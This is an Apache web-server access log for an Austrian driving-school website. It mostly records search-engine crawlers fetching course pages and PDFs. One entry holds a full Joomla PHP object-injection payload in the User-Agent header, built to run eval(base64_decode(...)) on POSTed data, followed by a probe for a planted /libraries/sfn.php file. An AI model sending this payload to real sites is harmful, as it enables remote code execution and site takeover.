65.55.210.66 - - [17/Oct/2017:04:07:27 +0200] "GET /img/mobile/pfeil-rechts.png HTTP/1.1" 200 1228 "https://www.easydrivers.at/kapfenberg.pankl" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
66.249.76.76 - - [17/Oct/2017:04:07:42 +0200] "GET /am.spitz/10281552?FS=BCE HTTP/1.1" 301 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.79 - - [17/Oct/2017:04:07:43 +0200] "GET /am.spitz/10281552?FS=BCE HTTP/1.1" 410 3382 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:07:54 +0200] "GET /wallensteinplatz HTTP/1.1" 200 3706 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:08:32 +0200] "GET /uploads/pdfs/amstetten/abendkursfeb_B-L17.pdf HTTP/1.1" 301 324 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:08:32 +0200] "GET /uploads/pdfs/amstetten/abendkursfeb_B-L17.pdf HTTP/1.1" 200 33871 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.48 - - [17/Oct/2017:04:08:52 +0200] "GET /binaries/easy-drivers-edelweiss-klagenfurt/apilliarx01jpg.jpg HTTP/1.1" 301 332 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:08:54 +0200] "GET /binaries/easy-drivers-edelweiss-klagenfurt/apilliarx01jpg.jpg HTTP/1.1" 200 596593 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.171.72 - - [17/Oct/2017:04:09:00 +0200] "GET /am.spitz/10281537?FS=BCE HTTP/1.1" 301 312 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.171.67 - - [17/Oct/2017:04:09:01 +0200] "GET /am.spitz/10281537?FS=BCE HTTP/1.1" 410 3382 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
79.196.233.72 - - [17/Oct/2017:04:09:14 +0200] "GET /bad.voeslau HTTP/1.1" 200 3754 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.76 - - [17/Oct/2017:04:09:21 +0200] "GET /uploads/pdfs/brigittenau/10281342_A1L17.pdf HTTP/1.1" 301 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:09:22 +0200] "GET /uploads/pdfs/brigittenau/10281342_A1L17.pdf HTTP/1.1" 200 35057 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:09:33 +0200] "GET /hartberg HTTP/1.1" 301 299 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.78 - - [17/Oct/2017:04:10:10 +0200] "GET /uploads/pdfs/wallensteinplatz/10281147_BC.pdf HTTP/1.1" 301 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:10:11 +0200] "GET /uploads/pdfs/wallensteinplatz/10281147_BC.pdf HTTP/1.1" 200 29882 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:10:47 +0200] "GET /steyr HTTP/1.1" 301 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.66.75 - - [17/Oct/2017:04:11:04 +0200] "GET /uploads/pdfs/spittelau/10281048_A2B.pdf HTTP/1.1" 301 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:11:05 +0200] "GET /uploads/pdfs/spittelau/10281048_A2B.pdf HTTP/1.1" 200 38423 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:11:19 +0200] "GET /guessing HTTP/1.1" 200 3485 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.66.74 - - [17/Oct/2017:04:11:58 +0200] "GET /uploads/pdfs/linz/mopedkurs_august_2_2016_AM.pdf HTTP/1.1" 301 329 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:11:58 +0200] "GET /uploads/pdfs/linz/mopedkurs_august_2_2016_AM.pdf HTTP/1.1" 200 27566 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.188.82 - - [17/Oct/2017:04:12:13 +0200] "GET / HTTP/1.1" 301 384 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.188.82 - - [17/Oct/2017:04:12:17 +0200] "GET / HTTP/1.1" 200 16442 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.188.82 - - [17/Oct/2017:04:12:19 +0200] "GET / HTTP/1.1" 301 384 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\xf0\x9d\x8c\x86"
69.197.188.82 - - [17/Oct/2017:04:12:19 +0200] "POST / HTTP/1.1" 301 384 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.188.82 - - [17/Oct/2017:04:12:19 +0200] "GET /libraries/sfn.php HTTP/1.1" 301 401 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
79.196.233.72 - - [17/Oct/2017:04:12:24 +0200] "GET /waidhofen.ybbs HTTP/1.1" 200 3516 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.66.74 - - [17/Oct/2017:04:12:52 +0200] "GET /spittelau/10281192?FS=BE96 HTTP/1.1" 301 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.120 - - [17/Oct/2017:04:12:50 +0200] "GET /leonding HTTP/1.1" 200 3496 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.84 - - [17/Oct/2017:04:12:52 +0200] "GET /spittelau/10281192?FS=BE96 HTTP/1.1" 410 3398 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.78 - - [17/Oct/2017:04:13:45 +0200] "GET /amstetten/abendkursokt?FS=BE96 HTTP/1.1" 301 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:13:46 +0200] "GET /amstetten/abendkursokt?FS=BE96 HTTP/1.1" 200 5723 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.55 - - [17/Oct/2017:04:14:36 +0200] "GET /moedling HTTP/1.1" 200 3831 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.74 - - [17/Oct/2017:04:14:39 +0200] "GET /spittelau/10281585?FS=CCE HTTP/1.1" 301 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:14:40 +0200] "GET /spittelau/10281585?FS=CCE HTTP/1.1" 410 3399 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.120 - - [17/Oct/2017:04:14:48 +0200] "GET /radfahrschule HTTP/1.1" 200 3464 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.120 - - [17/Oct/2017:04:15:00 +0200] "GET /krems HTTP/1.1" 200 3749 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.76 - - [17/Oct/2017:04:15:33 +0200] "GET /wallensteinplatz/10280930?FS=AM-M1 HTTP/1.1" 301 319 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:15:33 +0200] "GET /wallensteinplatz/10280930?FS=AM-M1 HTTP/1.1" 410 3422 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.78 - - [17/Oct/2017:04:16:27 +0200] "GET /uploads/pdfs/krumbach/10275064_AM-M1.pdf HTTP/1.1" 301 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:16:27 +0200] "GET /uploads/pdfs/krumbach/10275064_AM-M1.pdf HTTP/1.1" 200 30187 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:16:30 +0200] "GET /langenlois HTTP/1.1" 200 3446 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
79.196.233.72 - - [17/Oct/2017:04:16:53 +0200] "GET /fuehrerscheine/traktor HTTP/1.1" 301 306 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
207.46.13.55 - - [17/Oct/2017:04:17:02 +0200] "GET /spittelau HTTP/1.1" 200 3696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:17:15 +0200] "GET /bruck.leitha HTTP/1.1" 200 3502 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.66.72 - - [17/Oct/2017:04:17:20 +0200] "GET /uploads/pdfs/waidhofen.ybbs/Abendkurs_November_2016_A1L17.pdf HTTP/1.1" 301 337 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:17:21 +0200] "GET /uploads/pdfs/waidhofen.ybbs/Abendkurs_November_2016_A1L17.pdf HTTP/1.1" 200 36264 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.48 - - [17/Oct/2017:04:17:40 +0200] "GET /perg/aktionen HTTP/1.1" 301 303 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.157.254.197 - - [17/Oct/2017:04:17:51 +0200] "HEAD / HTTP/1.1" 301 - "https://www.inboundlinks.win/InboundLinks/www.easydrivers.at" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
66.249.66.72 - - [17/Oct/2017:04:18:14 +0200] "GET /uploads/pdfs/scheibbs/Abendkurs_SB_nov_2016_B-L17.pdf HTTP/1.1" 301 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:18:15 +0200] "GET /uploads/pdfs/scheibbs/Abendkurs_SB_nov_2016_B-L17.pdf HTTP/1.1" 200 34317 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:18:18 +0200] "GET /eisenerz.pankl HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:19:08 +0200] "GET /download.php?id=10248005 HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:19:08 +0200] "GET /download.php?id=10248005 HTTP/1.1" 200 39921 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.108 - - [17/Oct/2017:04:19:13 +0200] "GET /binaries/easy-drivers-martschitsch-hartberg/mini-gelb-black-14jpg.jpg HTTP/1.1" 301 336 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.108 - - [17/Oct/2017:04:19:31 +0200] "GET /binaries/easy-drivers-martschitsch-hartberg/mini-gelb-black-14jpg.jpg HTTP/1.1" 200 201425 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
79.196.233.72 - - [17/Oct/2017:04:19:40 +0200] "GET /jennersdorf HTTP/1.1" 200 3476 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.78 - - [17/Oct/2017:04:20:01 +0200] "GET /uploads/pdfs/hollabrunn/Grundkurs_Maerz_2017_BL1796.pdf HTTP/1.1" 301 334 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:20:02 +0200] "GET /uploads/pdfs/hollabrunn/Grundkurs_Maerz_2017_BL1796.pdf HTTP/1.1" 200 35365 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.255.64.106 - - [17/Oct/2017:04:20:29 +0200] "GET /fuehrerscheine/motorrad/C111 HTTP/1.1" 301 310 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
66.249.76.76 - - [17/Oct/2017:04:20:55 +0200] "GET /moedling/10281864?FS=AM-M1 HTTP/1.1" 301 314 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:20:56 +0200] "GET /moedling/10281864?FS=AM-M1 HTTP/1.1" 200 5519 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.79.180.3 - - [17/Oct/2017:04:21:01 +0200] "GET /skarabela.gross-enzersdorf/10247800 HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)"
207.46.13.55 - - [17/Oct/2017:04:21:14 +0200] "GET /perg HTTP/1.1" 200 3532 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.48 - - [17/Oct/2017:04:21:29 +0200] "GET /linz HTTP/1.1" 200 3374 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
164.132.161.43 - - [17/Oct/2017:04:21:48 +0200] "GET /bruck.leitha HTTP/1.1" 301 302 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
66.249.76.78 - - [17/Oct/2017:04:21:49 +0200] "GET /brigittenau/10281351?FS=A1L17 HTTP/1.1" 301 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:21:50 +0200] "GET /brigittenau/10281351?FS=A1L17 HTTP/1.1" 200 6342 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.76 - - [17/Oct/2017:04:22:43 +0200] "GET /uploads/pdfs/schwechat/10280323_CCE95.pdf HTTP/1.1" 301 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:22:43 +0200] "GET /uploads/pdfs/schwechat/10280323_CCE95.pdf HTTP/1.1" 200 28658 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:23:05 +0200] "GET /eisenstadt HTTP/1.1" 301 299 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.66.72 - - [17/Oct/2017:04:23:36 +0200] "GET /spittelau/10280817?FS=BE96 HTTP/1.1" 301 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:23:37 +0200] "GET /spittelau/10280817?FS=BE96 HTTP/1.1" 410 3399 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:24:02 +0200] "GET /perg HTTP/1.1" 301 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.76 - - [17/Oct/2017:04:24:30 +0200] "GET /uploads/pdfs/st.poelten/10259980_B-L.pdf HTTP/1.1" 301 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:24:31 +0200] "GET /uploads/pdfs/st.poelten/10259980_B-L.pdf HTTP/1.1" 200 30852 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.79.180.15 - - [17/Oct/2017:04:24:59 +0200] "GET /fuehrerscheine/bus/DD195-B HTTP/1.1" 301 310 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)"
207.46.13.120 - - [17/Oct/2017:04:25:02 +0200] "GET /eisenstadt HTTP/1.1" 200 3413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.120 - - [17/Oct/2017:04:25:05 +0200] "GET /fuehrerscheine/lkw HTTP/1.1" 200 2686 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.55 - - [17/Oct/2017:04:25:08 +0200] "GET /moedling/10281765?FS=B HTTP/1.1" 410 3470 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.55 - - [17/Oct/2017:04:25:10 +0200] "GET /kapfenberg.pankl HTTP/1.1" 200 3699 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.108 - - [17/Oct/2017:04:25:21 +0200] "GET /links HTTP/1.1" 200 2405 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.74 - - [17/Oct/2017:04:25:24 +0200] "GET /uploads/pdfs/retz/10259453_BF.pdf HTTP/1.1" 301 317 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:25:24 +0200] "GET /uploads/pdfs/retz/10259453_BF.pdf HTTP/1.1" 200 30341 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.55 - - [17/Oct/2017:04:25:23 +0200] "GET /oberwart HTTP/1.1" 200 3647 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
79.196.233.72 - - [17/Oct/2017:04:25:30 +0200] "GET /wallensteinplatz HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
52.53.231.176 - - [17/Oct/2017:04:25:36 +0200] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
52.53.231.176 - - [17/Oct/2017:04:25:37 +0200] "GET / HTTP/1.1" 400 292 "https://www.easydrivers.de/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
66.249.66.72 - - [17/Oct/2017:04:26:18 +0200] "GET /uploads/pdfs/perg/10277353_C.pdf HTTP/1.1" 301 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:26:18 +0200] "GET /uploads/pdfs/perg/10277353_C.pdf HTTP/1.1" 200 26994 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.78 - - [17/Oct/2017:04:27:11 +0200] "GET /uploads/pdfs/skarabela.gross-enzersdorf/10275499_BL1796.pdf HTTP/1.1" 301 338 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.79 - - [17/Oct/2017:04:27:12 +0200] "GET /uploads/pdfs/skarabela.gross-enzersdorf/10275499_BL1796.pdf HTTP/1.1" 200 35175 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:27:32 +0200] "GET /fuehrerscheine/lkw HTTP/1.1" 200 2686 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:28:05 +0200] "GET /uploads/pdfs/am.spitz/10281555_E.pdf HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:28:06 +0200] "GET /uploads/pdfs/am.spitz/10281555_E.pdf HTTP/1.1" 200 28256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.249 - - [17/Oct/2017:04:28:41 +0200] "GET /robots.txt HTTP/1.1" 301 397 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.249 - - [17/Oct/2017:04:28:41 +0200] "GET /robots.txt HTTP/1.1" 301 393 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.249 - - [17/Oct/2017:04:28:43 +0200] "GET /robots.txt HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
207.46.13.120 - - [17/Oct/2017:04:28:43 +0200] "GET /horn HTTP/1.1" 200 3450 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.76 - - [17/Oct/2017:04:28:59 +0200] "GET /uploads/pdfs/moedling/10281762_A1F.pdf HTTP/1.1" 301 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:28:59 +0200] "GET /uploads/pdfs/moedling/10281762_A1F.pdf HTTP/1.1" 200 38219 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.55 - - [17/Oct/2017:04:28:59 +0200] "GET /voesendorf HTTP/1.1" 200 3789 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
204.79.180.16 - - [17/Oct/2017:04:29:01 +0200] "GET /fuehrerscheine/lkw/C HTTP/1.1" 301 305 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)"
66.249.76.78 - - [17/Oct/2017:04:29:53 +0200] "GET /uploads/pdfs/voesendorf/10281933_A1F.pdf HTTP/1.1" 301 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:29:53 +0200] "GET /uploads/pdfs/voesendorf/10281933_A1F.pdf HTTP/1.1" 200 37968 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.55 - - [17/Oct/2017:04:30:34 +0200] "GET /st.poelten HTTP/1.1" 200 3501 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.76 - - [17/Oct/2017:04:30:46 +0200] "GET /uploads/pdfs/schwechat/10280359_B-L17.pdf HTTP/1.1" 301 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.84 - - [17/Oct/2017:04:30:47 +0200] "GET /uploads/pdfs/schwechat/10280359_B-L17.pdf HTTP/1.1" 200 35166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:30:53 +0200] "GET /fahrschulen HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.74 - - [17/Oct/2017:04:31:40 +0200] "GET /uploads/pdfs/bruck.leitha/10279425_B-L.pdf HTTP/1.1" 301 324 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:31:40 +0200] "GET /uploads/pdfs/bruck.leitha/10279425_B-L.pdf HTTP/1.1" 200 31232 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.78 - - [17/Oct/2017:04:32:34 +0200] "GET /uploads/pdfs/wallensteinplatz/10281381_A.pdf HTTP/1.1" 301 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:32:34 +0200] "GET /uploads/pdfs/wallensteinplatz/10281381_A.pdf HTTP/1.1" 200 32399 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.74 - - [17/Oct/2017:04:33:27 +0200] "GET /uploads/pdfs/spittelau/10281051_BL1796.pdf HTTP/1.1" 301 323 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:33:28 +0200] "GET /uploads/pdfs/spittelau/10281051_BL1796.pdf HTTP/1.1" 200 36038 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.76 - - [17/Oct/2017:04:34:21 +0200] "GET /uploads/pdfs/neunkirchen/10274963_B-L17.pdf HTTP/1.1" 301 324 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:34:22 +0200] "GET /uploads/pdfs/neunkirchen/10274963_B-L17.pdf HTTP/1.1" 200 37090 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.76 - - [17/Oct/2017:04:35:15 +0200] "GET /uploads/pdfs/eisenstadt/B_Kurs_Novermber_Dezember_A2BF.pdf HTTP/1.1" 301 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [17/Oct/2017:04:35:15 +0200] "GET /uploads/pdfs/eisenstadt/B_Kurs_Novermber_Dezember_A2BF.pdf HTTP/1.1" 200 33007 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.74 - - [17/Oct/2017:04:36:09 +0200] "GET /bruck.leitha/10279690?FS=A1F HTTP/1.1" 301 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:36:09 +0200] "GET /bruck.leitha/10279690?FS=A1F HTTP/1.1" 410 3439 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:36:33 +0200] "GET /fahrschulen HTTP/1.1" 200 3924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
195.154.48.192 - - [17/Oct/2017:04:37:44 +0200] "GET / HTTP/1.1" 301 383 "-" "Mozilla/3.0 (compatible; Indy Library)"
